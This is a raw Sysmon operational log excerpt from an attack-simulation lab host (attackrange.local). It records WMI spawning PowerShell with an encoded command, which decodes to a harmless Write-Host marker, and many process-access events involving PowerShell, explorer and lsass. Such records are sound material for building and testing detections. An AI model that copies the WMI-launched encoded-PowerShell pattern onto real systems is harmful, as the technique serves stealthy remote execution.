16:54:43.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-DEAA-00000000AD01}9656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002243080Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.454{05ADC7E1-6DD3-603E-DEAA-00000000AD01}9656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe /NoProfile /EncodedComma VwByAGkAdABlAC0ASABvAHMAdAAgAGYANQBhAGQAYQBjAGUAMQAtAGUAZABjADIALQA0ADQAZgA3AC0AOQAyADgANgAtADkAYQA1ADQAMwBlADQAYQBkADEAYgAxAA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x80000000000000002243079Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.436{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6DD3-603E-DCAA-00000000AD01}11576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002243078Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.436{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFFE1E9087EBAC40DB815327047E1964,SHA256=BC10B4BAFDF36013C39276E55E1BB3D28214DBFDC9B142F36BCE135BB17BC5F8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243077Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-DDAA-00000000AD01}5224C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243076Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-DCAA-00000000AD01}11576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243075Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-DBAA-00000000AD01}16244C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243074Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-DAAA-00000000AD01}13472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243073Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-D9AA-00000000AD01}4448C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243072Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-D8AA-00000000AD01}14280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243071Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243070Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243069Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243068Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243067Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.420{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6DD3-603E-DAAA-00000000AD01}13472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243066Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.420{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6DD3-603E-DAAA-00000000AD01}13472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243065Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243064Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243063Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243062Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243061Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243060Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 